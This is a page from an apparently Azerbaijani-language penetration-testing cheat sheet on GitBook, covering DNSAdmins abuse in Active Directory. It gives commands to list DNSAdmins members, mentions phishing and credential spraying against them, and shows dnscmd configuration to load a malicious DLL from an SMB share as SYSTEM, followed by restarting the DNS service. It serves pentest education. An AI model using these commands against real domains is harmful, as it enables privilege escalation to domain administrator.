Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • 1.DNSAdmins qrupunun üzvlərini əldə etmək üçün:
  • 2.İstifadəçilərdən sui-istifadə
  • 3.Zərərli DLL ilə Səlahiyyətlərin Yüksəldilməsi

Was this helpful?

  1. AD Pentesting
  2. Domain Privilege Escalation

DNSAdmins Abuse

"DNSAdmins Abuse" termini Active Directory mühitində DNSAdmins qrupuna üzvlüyün sui-istifadəsi ilə bağlıdır. Windows Serverində daxili qrup olan DNSAdmins qrupu, Domain Name System (DNS) xidmətinin idarə edilməsi ilə bağlı müəyyən icazələr və hüquqlar verilən qrupdur.

Əgər istifadəçi DNSAdmins qrupunun üzvüdürsə, o, SYSTEM kimi işləyən dns.exe imtiyazları ilə ixtiyari DLL'ni (Dynamic Link Library) yükləyə bilər. DC DNS xidməti verərsə, istifadəçi öz imtiyazlarını DA'ə yüksəldə bilər. Bu prosesi həyata keçirmək üçün DNS xidmətini yenidən başlatmağa imkan verən səlahiyyətlərə ehtiyac var.

1.DNSAdmins qrupunun üzvlərini əldə etmək üçün:

PowerView:

Get-NetGroupMember -GroupName "DNSAdmins"

AD Modulu:

Get-ADGroupMember -Identiny DNSAdmins

2.İstifadəçilərdən sui-istifadə

DNSAdmins qrupunun üzvlərini müəyyən etdikdən sonra təcavüzkar, istifadəçinin etimadnamələrini pozmaq və ya onların hesabına giriş əldə etmək üçün müxtəlif üsullardan istifadə edə bilər. Bu üsullara, fişinq, credential spraying, zəifliklərdən istifadə və s. daxildir.

3.Zərərli DLL ilə Səlahiyyətlərin Yüksəldilməsi

DLL (Dynamic Link Library), eyni vaxtda bir neçə proqram tərəfindən istifadə edilə bilən funksiya və prosedurları saxlamaq üçün istifadə edilən fayl formatıdır. DLL'lər proqramlara kodu və resursları paylaşmağa imkan verir. SMB share'də zərərli DLL xidməti göstərməklə və dll istifadəsini konfiqurasiya etməklə səlahiyyət yüksəldilməsi hücumu həyata keçirə bilərik:

#dnscmd ilə SMB paylaşımında zərərli DLL xidmətinin aktiv edilməsi və zərərli DLL'dən istifadə etmək üçün DNS konfiqurasiyası:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll

#DNS xidmətinin restart edilməsi:
sc \\DNSServer stop dns
sc \\DNSServer start dns
PreviousResource Based Constrained DelegationNextAbusing Active Directory-Integraded DNS (ADIDNS) poisoning

Last updated 1 year ago

Was this helpful?